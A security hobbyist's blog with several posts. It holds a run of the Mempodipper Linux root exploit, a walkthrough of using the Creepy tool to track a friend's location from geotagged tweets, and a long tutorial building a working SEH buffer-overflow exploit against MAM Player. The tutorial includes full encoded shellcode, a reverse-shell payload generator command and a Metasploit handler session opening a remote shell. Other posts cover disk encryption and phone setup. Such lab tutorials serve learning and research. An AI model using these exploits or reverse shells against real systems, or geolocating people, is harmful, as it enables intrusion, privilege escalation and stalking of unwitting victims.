netsecuritystuff

Backtrack 5 kernel whoops !!

watathi — Tue, 24 Jan 2012 11:20:30 +0000

Backtrack 5, and apparently many other kernels of linux >=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog http://blog.zx2c4.com Exploit code can be obtained here href=”http://www.exploit-db.com/exploits/18411/

chalo@bt:~$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
root

Installing backtrack on encrypted partition with luks

watathi — Sun, 01 Jan 2012 06:55:06 +0000

Before you start please note that this process will format any data you have. Have a full backup of your system before you begin. Be sober while you are doing this please. I have tested the tutorial for backtrack 4 pre-final, backtrack 4 final, backtrack 5 and backtrack 5 r1.
Kindly note that my hardisk setup may be different than yours. I want to install backtrack as follows:

/dev/sda1 —– /boot partition
/dev/sda2 —– /root partition

My /root partition will be encrypted with luks such that in order for me to boot, i will have to enter a password.Boot with a live cd and proceed as follows
Kindly remember to change your partitions as necessary

Format the /root partition with luks. Enter the password you want to be using at startup.

root@bt:~# cryptsetup luksFormat /dev/sdXX

Open the partion for mounting. Enter the password you entered above

root@bt:~# cryptsetup luksOpen /dev/sdXX root

Format the container with ext3 filesystem. You can use whichever linux filesystem you are comforable with

root@bt:~# mkfs.ext3 -j -O extent /dev/mapper/root

After this is done, run the backtrack installer(install.sh) on backtrack desktop. Double clicking it should do.
Select your country.
Select the keyboard layout.

Then we now go to partition the disk . Select manual and click next

Select the partition for boot, for me thats /dev/sda1. Click “edit partition” and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /boot

Select the partition for root, for me thats /dev/mapper/root. Click “edit partition” and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /root

My final setup for the install looks as below. I know, my hardisk is rather small

When you click next, you will get a warning about swapspace. I personally opt not to have swapspace. I have enough memory to run backtrack and a few virtual machines. Click “continue”

The next bit is important. Click “Advanced” .It is the location backtrack will install the bootloader. I usually install the bootloader to hd0 but you can install it to the linux partition. Even if you have windows, you can install the bootloader to hd0, and when it comes time to boot, you will be presented with options as to which os to boot.

You are now set for the install. Click install and wait for the backtrack install to finish. After its done, click the “continue using the live cd”
We need to make a few changes before we exit the live cd

root@bt:~# mkdir /mnt/root
root@bt:~# mount /dev/mapper/root /mnt/root/

Mount the /boot partition

root@bt:~# mount /dev/sdXX /mnt/root/boot
root@bt:~# mount -t proc proc /mnt/root/proc/
root@bt:~# mount -o bind /dev /mnt/root/dev/
root@bt:~# chroot /mnt/root/ /bin/bash

Using a text editor like vi or nano, edit the /etc/crypttab and add the /root partition here

root /dev/sdXX none luks

Using a text editor like vi or nano, edit the /etc/fstab file. Remove any other lines you will find and leave your file in the below order. Replace the XX with your partitions

/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
/dev/sdXX /boot ext3 defaults 0 0

Using a text editor like vi or nano, edit the /etc/initramfs-tools/modules file and add the following modules to the end of the file

aes-i586
sha256
dm-mod
dm-crypt

Create the new initrd image

root@bt:~# update-initramfs -k all -c

Install grub to your harddisk. Use the device name and not a partition e.g /dev/sda

root@bt:~# grub-install /dev/sdX

root@bt:~# exit

root@bt:~# reboot

Your /root partition should now be encrypted and you will be asked a password when booting to decrypt it.

Credits to esc201, who wrote a good tutorial on encrypting the disk with bt4-prefinal.

Swag 2.0 Beta

watathi — Fri, 26 Aug 2011 19:23:56 +0000

Went to Uganda, met Johnny, I let pictures say the rest. But this beats cool at so many levels. thanks for the wonderful time and gifts. He also gave me a coin and the badge for defcon, not included now because they are with a pal. Enjoy the gallery.Its an honor for me

And Johnny is back, what do I mean, he is back to security.Watch this small space. It was a nice cathcup, we spoke of the sweetness of the pwnphone amongst other good things. He is ok, please remember donating to HFC. Ok, enough talk.

Look at this cool dirty security tshirt. Actually I had to put it on on my way back. This just rocks

And a backtrack revolution shirt from the offsec team. Oh my..

And this hackers for charity defcon shirt to top up the collection. This made heads turn in Nairobi when I put it on.

To pwn with pwnimage or not to on the nokia n900

watathi — Thu, 07 Jul 2011 07:36:33 +0000

Pwineexpress has just released the pwnimage for the nokian900 to the community. http://www.pwnieexpress.com/pwn_phone.html The pwnimage is an easy to use customized n900 suited for pentests. It contains some tools you would find in backtrack. I got some time today and installed the image to my phone. Below is a screenshot. The question I have is do I use this pwnimage or do I use my manually customized n900

Reasons for the pwnimage
The image comes with presinstalled tools and easy to use shortcuts on the desktop that start applications fast. such as wifizoo,packet injection,sslstrip,metasploit.nmap,fake ap etc. This saves time for any pentester . With just a single click most these tools will run.Its awesome

Reasons against pwnimage
There is a licence agreement that you cannot reverse engineer the software etc which is a little peculiar because most of these software is under gnu or bsd licence.
I try to be paranoid, not running on not so common platforms because of backdoors ,etc

My conclusion: I will use the pwnimage, first it is a really good idea to have your n900 setup in such an easy mode to pwn for any pentest. I remember when backtrack v1 was released back then, some people argued that you could compile all those packages alone. Right now backtrack is the most widely used pentesting distro. Its not that I cannot run ./configure;make;make install or apt-get install, I love spending some sleepless nights trying to tweak my n900, its just the time saved and bringing all these packages together to work perfectly takes skill and takes time.
Several projects have come up such as Neopwn which was a little hypped up but we havent seen anything come out of it. I can run backtrack 5 on my n900 but is is a little too slow and the screen calibration on my n900 is really not just working perfectly.
Aside from the fears i know if we the “community” can really pick up this pwnimage and improve it m sure there`s better things in the future for the n900. Thanks to pwineexpress for releasing this. I choose to pwn.

Pimped by Hackers For Charity

watathi — Fri, 17 Jun 2011 09:18:57 +0000

Just back from Uganda where I had gone for some business and also took time to visit Johnny long. He is doing well and his family is ok although he really needs your support. Today is the last day to vote for drobos so keep voting for HFC. http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/
I also saw Sophos challenging lulzsec to follow in the way of Johnny long. Wouldnt that be something . http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/
It is always a pleasure meeting such a great and humble person like Johnny.Apart from catching up with Johnny and he gave me so much gear and swag. Here are some photos.

Johnny on “the beast”.He was beaten to the finish line by the guy on the far left carrying two bags of charcoal. Its now easier to navigate Jinja with this bike. It was a miracle how Johnny got it, i guess he will soon blog about it.

Johnny`s presentation badge for Shmoocon and notice the cool red blackhat bag.

Shmoo mouse pad

Some hardware hacking stuff, you had to program it to read ninja party to be allowed to the party

This shirt is to kill for.. literally . It is a collectors item that has a different logo at the back. It was specifically for the shmoocon conference. I am honored to get this.

HFC stickers to spread the word to all the world

Installing VirtualBox on Backtrack 5

watathi — Mon, 23 May 2011 13:52:05 +0000

Backtrack 5 doesnt come with the kernel headers installed.So you will need to download them and then proceed with installing virtualbox. The commands are listed below

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, edit /etc/apt/sources.list as shown below and download virtualbox

root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0

Backtrack5 on the nokia n900

watathi — Wed, 18 May 2011 20:13:45 +0000

Just managed to get my sweet nokia n900 phone to run Bt5 . For me to write a tutorial on this would be an injustice because the steps have been documented properly in this blog http://pcsci3nce.info/?p=177

Below is a screenshot of my phone.

Creepy…………….

watathi — Thu, 31 Mar 2011 11:51:01 +0000

Last year at Dojocon, Dave Marcus gave a really awesome talk about Using Social Networks To Profile, Find and 0wn Your Victims. During the video, he was able to track a person from twitter geodata a person using loic to peform a distributed denian of service (ddos) .
Guess what, now there is a software realased to do this mainstream. Thanks to Yiannis Kakavas, creepy is alive. All you need is the twitter id or Flickr username of someone. It finds phots that somebody uploaded, extracts geolocation information from these pics and maps exactly where the data came from. It is possible for you to track somebody`s movement over time and even locate their home, if they ever twweted from home. This awesome information gathering tool can be found here. https://github.com/ilektrojohn/creepy/downloads
Its time to turn off gps geolaction features on our phones. Kindly read more about the tool here.http://www.thinq.co.uk/2011/3/30/creepy-app-warns-end-privacy/
I used a friends twitter id and pulled the map below.Now that is really creepy

User interface

Feed the username and get your data.

Nokia n900

watathi — Mon, 28 Mar 2011 11:39:16 +0000

I finally managed to get my hands on a Nokia n900 series. I will let the pictures do the talking, but it is just the most awesome phone to have. I had so much fun configuring it to work as my ultimate pentesting phone. Packet injection works ok, so many pentesting tools can be installed. Enjoy my phones screenshots. There is a series for “weaponizing the nokia n900″ and also there are interesting tutorials at the following links:
https://www.infosecisland.com/blogview/5640-Weaponizing-the-Nokia-N900-Part-1.html
https://www.infosecisland.com/blogview/9921-Weaponizing-the-Nokia-N900-Part-3.html
https://www.infosecisland.com/blogview/8056-Weaponizing-the-Nokia-N900-Part-2.html
http://zitstif.no-ip.org/?p=451
http://zitstif.no-ip.org/?p=459
http://www.knownokia.ca/
http://pwnieexpress.com/pwn_phone.html.

The innocent looking phone.

My “desktop”

The debian lxde and you can also chroot to /home. I love the game crazy chicken. Really easy and fun to play.Dont judge me

looks familiar ? M still testing and reconfiguring most tools from my backtrack distro.

Metasploit on the n900, need i say more …….

Yes thats meterpreter

Ettercap for mitm. Its possible to combine this with ssltrip

Packet Injection works with the bleeding-edge wl1251 driver

Another SEH tutorial

watathi — Tue, 15 Feb 2011 08:50:00 +0000

The application we will look at can be downloaded here.

http://www.musanim.com/player/MAMPlayer2006aug19_035.zip

The exploit has been documented here,

http://www.exploit-db.com/exploits/15901/

but we will go through the process of creating the exploit from scratch.
Credits to corelan for their great exploit writing tutorials

Confirm the crash seriously takes place. Fill buffer with around 5000 A`s

my $filename=”firstcrash.mamx”;
my $junk=”A”x5000;
my $payload=$junk;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Open the program with windbg as an executable and run it. Open the file firstcrash.mamx and the program crashes. Run f5 or g and confirm with !exchain that this is an SEH problem

0:000> g
(538.440): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012f10c ebp=0012f12c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+0x414140f0:
41414141 ?? ???
0:000> !exchain
0012f120: ntdll!ExecuteHandler2+3a (7c9032bc)
0012f6b0: MAM2006+3c078 (0043c078)
0012f6ec: MAM2006+3c078 (0043c078)
0012fa60: +414140f0 (41414141)
Invalid exception stack at 41414141

Second, send the 5000`s characters with a metasploit pattern so that we can be able to determine where the exactly the crash takes place.

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000 > /home/chalo/pgm/sploitattion/fat/crash.mamx

Open mamplayer with windbg again and open the crash.mamx file. The application crashes again.Press f5 or g. and then run load the byakugan plugin from metasploit to determine the offset.

0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 5000
[Byakugan] Control of ecx at offset 116.
[Byakugan] Control of eip at offset 116.

We now need to get a pop pop ret address to use. we can check the dll`s that load for the mamaplayer application and we can use msfpescan in metasploit to look for a workable address. Checking windbg and we notice some dll`s that mamplayer uses

ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 10000000 10050000 C:\WINDOWS\system32\VBoxOGL.dll
ModLoad: 01780000 017c0000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

We copy over msacm32.drv to our linux box and use msfpescan to get addresses we can use as SEH

root@bt:/pentest/exploits/framework3# ./msfpescan -p /home/chalo/pgm/sploitattion/fat/msacm32.drv > /home/chalo/pgm/sploitattion/fat/memaddresses.txt
root@bt:/home/chalo/pgm/sploitattion/fat# cat memaddresses.txt | grep “pop edi; pop esi; “
0x72d11225 pop edi; pop esi; retn 0x000c
0x72d11f39 pop edi; pop esi; retn 0×0004
0x72d1263d pop edi; pop esi; retn 0×0008
0x72d1269c pop edi; pop esi; retn 0×0008

We now need to check how the stack looks like. We put breakpoints in our code

my $filename=”crash3.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xcc\xcc\xcc\xcc”;
my $seh=pack(‘V’,0x72d11f39);
my $shellcode=”1234567890qwertyuiopasdfghjkl”;
my $junk2=”D” x300;

my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Lets check the stack.

0:000> g
(88.4ac): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa60 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa0f:
0012fa60 cc int 3
0:000> d eip
0012fa60 cc cc cc cc 39 1f d1 72-31 32 33 34 35 36 37 38 ….9..r12345678
0012fa70 39 30 61 62 63 64 65 66-67 68 69 6a 6b 6c 6d 6e 90abcdefghijklmn
0012fa80 6f 70 71 72 73 74 75 76-77 78 79 7a 44 44 44 44 opqrstuvwxyzDDDD
0012fa90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Good, no spaces between our code. Now we just need to set our next seh handler(nseh) to jump 6 bytes. Replace the shellcode with break points .

my $filename=”crash3.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xeb\x06\x90\x90″;
my $seh=pack(‘V’,0x72d11f39);
my $shellcode=”\xcc\xcc\xcc\xcc”;
my $junk2=”D” x300;

my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Checking the stack again

0:000> g
(3a8.5f0): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa68 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa17:
0012fa68 cc int 3
0:000> d eip
0012fa68 cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44 ….DDDDDDDDDDDD
0012fa78 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa88 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa98 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Replace the breakpoints with real shellcode to pop a calc from msfpayload and pwn the application.

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c

So the new code becomes

my $filename=”crash5.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xeb\x06\x90\x90″;
my $seh=pack(‘V’,0x72d11f39);

my $shellcode =
“\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43″ .
“\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41″ .
“\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42″ .
“\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50″ .
“\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30\x45″ .
“\x50\x45\x50\x43\x50\x4b\x39\x5a\x45\x56\x51\x4e\x32\x52\x44″ .
“\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x56″ .
“\x32\x52\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x51\x5a” .
“\x51\x36\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c\x43″ .
“\x51\x43\x4c\x45\x52\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d” .
“\x45\x51\x4f\x37\x4b\x52\x4c\x30\x50\x52\x56\x37\x4c\x4b\x56″ .
“\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c\x4b” .
“\x47\x30\x52\x58\x4d\x55\x49\x50\x52\x54\x50\x4a\x45\x51\x4e” .
“\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47\x50″ .
“\x45\x51\x4e\x33\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x50\x34\x4c” .
“\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x56\x51\x4f\x30\x4e\x4c” .
“\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x54″ .
“\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56\x44″ .
“\x52\x55\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x45\x51\x49″ .
“\x43\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c” .
“\x43\x31\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4b” .
“\x39\x50\x44\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x51\x49″ .
“\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c” .
“\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x43\x5a\x43\x31\x4c\x4d” .
“\x4c\x45\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x43\x58\x56″ .
“\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x4b\x4e” .
“\x54\x4e\x47\x42\x4b\x5a\x52\x48\x49\x36\x5a\x35\x4f\x4d\x4d” .
“\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30″ .
“\x4b\x4b\x4d\x30\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53\x52″ .
“\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43\x53″ .
“\x43\x51\x52\x4c\x52\x43\x56\x4e\x45\x35\x52\x58\x43\x55\x43″ .
“\x30\x54\x4a\x41\x41″;

my $junk2=”D” x300;
my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Open the file with the application and you will be able to pop a calc. You can modify the shellcode to do taks such as reverse shell on a tcp port.

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.10.1 LPORT=4444 R | ./msfencode -e x86/alpha_upper -t c

Then change your shellcode above from calc to the new shellcode for reverse shell. Set up your metasploit listener first and then after that open the new file with mamplayer . Boom !!!! You get your reverse shell back

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
– —-
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > set EXITFUNC seh
EXITFUNC => seh
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.10.1:4444
[*] Starting the payload handler…
[*] Sending stage (240 bytes) to 192.168.10.130
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.130:1032) at Wed Jan 12 12:27:51 +0300 2011

C:\Documents and Settings\bb\Desktop\rr\fat>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\Documents and Settings\bb\Desktop\rr\fat>